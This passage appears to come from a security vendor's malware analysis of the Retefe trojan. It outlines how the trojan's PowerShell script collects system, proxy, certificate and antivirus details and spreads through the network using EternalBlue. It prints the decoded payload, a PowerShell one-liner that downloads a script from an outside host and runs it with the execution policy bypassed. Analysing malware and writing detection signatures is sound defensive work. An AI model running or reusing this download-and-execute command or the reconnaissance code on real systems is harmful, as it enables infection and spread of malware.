    $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages);
  • PowerShell version.
  • Proxy auto-config settings from the registry key:
    $pac=Get-ItemProperty 'hkcu:Software\Microsoft\Windows\CurrentVersion\Internet Settings'|Select -expand AutoConfigURL -ErrorAction Stop;
  • Whether a certificate with the following subject field is installed on the machine:
    *COMODO RSA Extended Validation Secure Server CA 2*
  • Information about tor and socat running on the system.
  • Directory listing of: %AppData%\Ad0be
  • Information about the installed AV on the machine:
    $avlist=(Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct" @psboundparameters|Select -expand DisplayName);

After collecting the above information from the machine, the script finally executes the SMB EternalBlue exploit. The PowerShell script collects all the IP addresses in the network and invokes EternalBlue as shown below:

The EternalBlue() function in the script contains a “payload” variable which holds encoded data. After decoding, it is revealed to be a PowerShell command that downloads another PowerShell script from the server, as shown below:
powershell -ep Unrestricted -ec $F=$env:Temp+'\s.ps1';(New-Object System.Net.WebClient).DownloadFile('http://karinart.de/css/0FgYsvuX9V445592.ps1',$F); Start-Process "powershell" -ArgumentList "-ep Bypass -f $F" -Wait NoNewWindow

The script downloaded by the above command contains Base64-encoded data:

The decoded data is another executable file that drops another JavaScript, which is the same as the previous one; the only difference is that the new JavaScript does not contain the EternalBlue script, to avoid an infinite loop of EternalBlue infection:

SonicWall Capture Labs detects this threat via the following signatures:

  • GAV: Retefe.A_3 (Trojan)
  • GAV: Retefe.B (Trojan)